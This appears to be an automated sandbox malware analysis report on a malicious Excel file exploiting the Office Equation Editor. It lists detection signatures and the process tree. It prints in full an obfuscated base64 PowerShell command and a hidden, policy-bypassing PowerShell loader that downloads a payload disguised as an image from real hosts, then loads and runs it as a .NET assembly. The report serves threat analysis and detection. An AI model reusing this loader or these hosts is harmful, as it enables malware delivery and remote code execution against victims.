Edit tour

Windows Analysis Report
P018400.xla.xlsx

Overview

General Information

Sample name:	P018400.xla.xlsx
Analysis ID:	1391417
MD5:	e9ff33ad374e8c0a52fac68e8e9c4fa1
SHA1:	6756634e8cec1f0679ad3b79b64de21497ad8e55
SHA256:	46e9f5dc33458a0c7333508cf6c03b3e298217507b52fcc54d1d43b26488e2c6
Tags:	xlaxlsx
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Sigma detected: rundll32 run dll from internet

System process connects to network (likely due to code injection or exploit)

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Installs new ROOT certificates

Microsoft Office drops suspicious files

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Shellcode detected

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Excel Network Connections

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1404 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

WINWORD.EXE (PID: 848 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

rundll32.exe (PID: 1668 cmdline: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO MD5: DD81D91FF3B0763C392422865C9AC12E)

EQNEDT32.EXE (PID: 1668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 2096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 2856 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreTwBFDgTreEwDgTreLwBPDgTreEUDgTreTDgTreDgTrevDgTreDYDgTreOQDgTreuDgTreDQDgTreNDgTreDgTreyDgTreC4DgTreMgDgTre5DgTreC4DgTreMQDgTre5DgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBMDgTreEUDgTreTwDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 1700 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} } MD5: EB32C070E658937AA9FA9F3AE629B2B8)

AcroRd32.exe (PID: 3132 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)

RdrCEF.exe (PID: 3616 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1d0b:$obj2: \objdata 0x1cf7:$obj3: \objupdate 0x1cd3:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1d0b:$obj2: \objdata 0x1cf7:$obj3: \objupdate 0x1cd3:$obj4: \objemb

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 2856	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xd238d:$b2: ::FromBase64String( 0x164505:$b2: ::FromBase64String( 0x164e39:$b2: ::FromBase64String( 0x165ec5:$b2: ::FromBase64String( 0x1664d1:$b2: ::FromBase64String( 0x166c73:$b2: ::FromBase64String( 0x1671fe:$b2: ::FromBase64String( 0xd21f8:$b3: ::UTF8.GetString( 0x16436a:$b3: ::UTF8.GetString( 0x164c9e:$b3: ::UTF8.GetString( 0x165d2a:$b3: ::UTF8.GetString( 0x166336:$b3: ::UTF8.GetString( 0x166ad8:$b3: ::UTF8.GetString( 0x167063:$b3: ::UTF8.GetString( 0x33b54:$s1: -join 0x70065:$s1: -join 0x97b43:$s3: reverse 0x991c2:$s3: reverse 0x9948d:$s3: reverse 0x99b2e:$s3: reverse 0x9a2d3:$s3: reverse
Process Memory Space: powershell.exe PID: 1700	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x40a0:$b2: ::FromBase64String( 0x1d939:$b2: ::FromBase64String( 0x237a0:$b2: ::FromBase64String( 0x23d1f:$b2: ::FromBase64String( 0x3b38f:$b2: ::FromBase64String( 0x3b915:$b2: ::FromBase64String( 0x3c0ae:$b2: ::FromBase64String( 0x3c7de:$b2: ::FromBase64String( 0x1323d8:$b2: ::FromBase64String( 0x133140:$b2: ::FromBase64String( 0x5fe1b4:$b2: ::FromBase64String( 0x5fe733:$b2: ::FromBase64String( 0x645f7d:$b2: ::FromBase64String( 0x64648a:$b2: ::FromBase64String( 0x651f44:$b2: ::FromBase64String( 0x66aaa0:$b2: ::FromBase64String( 0x66f007:$b2: ::FromBase64String( 0xb2a4b2:$b2: ::FromBase64String( 0xb2aa32:$b2: ::FromBase64String( 0xb2bb78:$b2: ::FromBase64String( 0xb4979d:$b2: ::FromBase64String(

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 91.92.244.96, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1668, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1668, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Leoloverme[1].vbs

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4D